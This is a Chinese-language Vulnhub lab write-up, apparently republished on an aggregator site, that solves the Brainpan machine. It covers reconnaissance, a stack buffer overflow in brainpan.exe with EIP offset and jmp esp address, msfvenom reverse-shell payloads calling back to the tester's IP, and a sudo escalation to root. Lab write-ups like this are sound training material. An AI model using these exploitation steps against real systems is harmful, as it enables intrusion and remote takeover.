vulnhub靶机Brainpan

这篇具有很好参考价值的文章主要介绍了vulnhub靶机Brainpan。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

主机发现

arp-scan -l

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

端口扫描

nmap --min-rate 10000 -p- 192.168.21.156

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

服务扫描

nmap -sV -sT -O -p9999,10000 192.168.21.156

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这个地方感到了有点不对劲,python起来的一个web端口

漏洞扫描

nmap --script=vuln -p9999,10000 192.168.21.156

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

意料之中,先去看一下web的内容

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这个就是一张图片,但是还是扫个目录看一下

dirb http://192.168.21.156:10000

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这里有一个exe文件,想都不用想要下下来

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

文件没有什么问题

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

但是9999端口发现了点东西,web不能直接交互用nc连着试试

nc 192.168.21.156 9999

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

接下来只剩下一条线索(exe文件)

前面已经查看了文件有没有特殊的地方,接下来就剩下文件的内容了

strings brainpan.exe

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

后面还有很多,但是发现这个界面挺熟悉的,那么9999端口上运行的也是这个exe了

这里可能这个有用

[get_reply] copied %d bytes to buffer

Shitstorm

试一下

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这里只是成功了但是没有看到什么,去windows试一下

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

试过之后发现

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这里有复制字符串的函数这里很有可能出现溢出漏洞

这里写脚本吧

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

多跑几遍

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这里发现600-700之间出现报错,那么软件是在600字节的时候崩的,需要再一次确定具体的字节数,利用不一样的字节来判断什么时候出现溢出

msf-pattern_create -l 600

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

修改刚刚写的脚本

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

需要使用新的软件immunitydebugger

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

注意寄存器,需要吧缓冲区全部占满,然后吧我们的shell写进去

先运行脚本

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

注意要这个软件的exe文件在运行状态

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这里只要看eip(这个是下一个指令的位置),记住eip的值

35724134

计算偏移量

msf-pattern_offset -l 600 -q 35724134

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

524字节填充eip

那么修改一下脚本

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

B和c(看看寄存器来确定b,剩下来的就是c的数据),再来运行程序

python2.7 yichu.py

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

堆栈的情况

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

Ascii编码(42 = b)(hex)

我们找到了eip,只需要在后面放入shell再将eip指向shell(350-400)就可以

修改脚本(扩容c)

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

只能多不能少

测试

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

计算字节数

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

一共468字节

去掉坏字符,不同的程序坏字符不一样,要去掉这些

去github来解决可能的坏字符问题

git clone GitHub - cytopia/badchars: Bad char generator to instruct encoders such as shikata-ga-nai to transform those to other chars.

./badchars -f ruby

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

修改脚本

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

进行测试

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

注意esp寄存器,右键follow in dump一下

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

在ff之后发现00且不是连续的证明有坏字节

此处只有00是坏字节

修改脚本(在前面的esp上面写出eip的地址)

查看jmp esp的代码

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

能找到brainpan的程序

发现安全机制都没有启用

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这个找到的地址就能发现这个是esp指针就能重定向到esp去

0x311712f3

因为有大小端问题需要反写进入cpu(一般是小端)(字节倒序)

反弹shell编写

msfvenom -p windows/shell_reverse_tcp lhost=192.168.21.146 lport=666 -b "\x00" -e x86/shikata_ga_nai -f c

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

记得要用nop来空格解码

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

测试

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

成功

记得修改shell需要攻击靶机了

生成linux的shell

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.21.146 lport=666 -b "\x00" -e x86/shikata_ga_nai -f cvulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

修改脚本

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

测试

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

成功拿到

提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

sudo -l

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

更具提示往没有密码的位置钻

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

这里有command可以去试试

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

直接一个/bin/bash抬走下一位

vulnhub靶机Brainpan,vulnhub,网络安全,web安全,安全,系统安全

结束文章来源地址https://www.toymoban.com/news/detail-706500.html

到了这里,关于vulnhub靶机Brainpan的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub: blogger:1靶机

    kali:192.168.111.111 靶机:192.168.111.176 端口扫描 在80端口的 /assets/fonts/ 目录下发现blog目录,访问后发现为wordpress 利用wpscan发现wordpress插件 wpdiscuz 存在任意文件上传漏洞 msf进行漏洞利用 vagrant用户的密码同样为vagrant vagrant用户sudo权限 提升为root flag

    2024年02月14日
    浏览(38)
  • vulnhub momentum 靶机复盘

    到学校了 原来的桥接配置要改 这里记录几个点备忘 重新安装驱动VBoxNetLwf.inf 手动安装VBoxNetLwf.inf 不要用virtualbox自带的netlwfinstall rw init=/bin/bash 进去看看网卡配置 一个没什么功能点的web 在main.js下发现opus-details.php 可以传参id 然后会原封不动的展示 可以xss 没啥用 尝试对cook

    2024年02月06日
    浏览(43)
  • Vulnhub: bassamCTF: 1靶机

    kali:192.168.111.111 靶机:192.168.111.210 端口扫描 修改hosts文件 爆破出子域名 welcome 对子域目录爆破 index.php 存在文件读取 查看 /etc/passwd 和 config.php 用 config.php 中的账号密码登录ssh,账号: test ,密码: test123 查看test用户的历史命令发现文件 MySecretPassword MySecretPassword 文件内容

    2024年02月11日
    浏览(38)
  • Vulnhub: Corrosion靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 目录爆破 blog-post目录下存在两个目录 对archives目录中的randylogs.php进行测试发现存在文件包含 成功包含ssh日志 利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell 文件包含ssh日志文件执行反弹shell 在/var/backups目录下发现us

    2024年02月09日
    浏览(39)
  • vulnhub靶机Misdirection

    下载链接:https://download.vulnhub.com/misdirection/Misdirection.zip 解压后双击ovf文件导入虚拟机 网络:DHCP、NAT、192.168.100.0/24网段 192.168.100.133是新增的ip 发现开放了以上端口,继续扫描端口详细信息 扫描的同时去访问一下80和8080端口看看 80是正常的网站 8080是apache默认页 进行目录扫描

    2024年02月02日
    浏览(49)
  • Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(36)
  • vulnhub靶机Phineas

    下载地址:https://download.vulnhub.com/phineas/Phineas.ova 主机发现 目标154 端口扫描 端口服务扫描 漏洞扫描 直接访问web 初始页面,我就不信没东西,开扫! 访问一下 访问fuel时候发现url变化了 只能进行拼接url那就试一下凭借主页的文件(index.php) url变成这样了 提示是fuel直接去查

    2024年02月05日
    浏览(36)
  • vulnhub靶机02-Breakout

    主机发现 arp-scan -l 扫描端口 nmap --min-rate 10000 -p- 192.168.21.143 扫描端口信息 nmap -sV -sT -O -p80,139,445,10000,20000 192.168.21.143 漏洞扫描 nmap --script=vuln -p80,139,445,10000,20000 192.168.21.143 先看网站 什么都没有看看f12 找到点好东西 解码看看 Brainfuck/OoK加密解密 - Bugku CTF 这个应该没用了,再去

    2024年02月10日
    浏览(39)
  • Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(55)
  • Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包